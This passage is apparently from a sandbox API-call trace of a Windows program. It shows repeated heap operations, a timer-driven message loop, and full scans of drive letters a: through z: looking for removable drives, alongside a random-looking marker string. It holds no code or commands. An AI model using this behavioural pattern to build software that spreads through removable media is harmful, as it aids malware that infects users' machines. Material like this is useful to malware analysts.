(lpRootPathName="j:\\") returned 0x1 [0218.762] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.763] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.763] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.763] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.763] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.763] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.764] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.764] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.764] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.764] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.764] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.765] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.765] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.765] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.765] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.767] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.768] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.768] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.768] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.769] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0218.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0218.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.770] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.770] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.770] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.771] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.771] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.771] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.771] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.772] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.772] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.772] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.772] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.792] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.793] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.794] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.794] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.794] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.794] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.794] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.795] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.795] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.796] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.796] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.796] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.796] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.798] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.798] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.798] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.799] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.799] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.799] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.799] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.799] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.799] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.800] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.800] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.800] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.800] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.800] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.801] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.801] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.801] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.801] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.801] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.802] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.803] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.803] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.803] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.803] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.803] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.804] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0218.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0218.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0218.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0218.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.805] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.805] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.805] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.806] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.806] RtlAllocateHeap 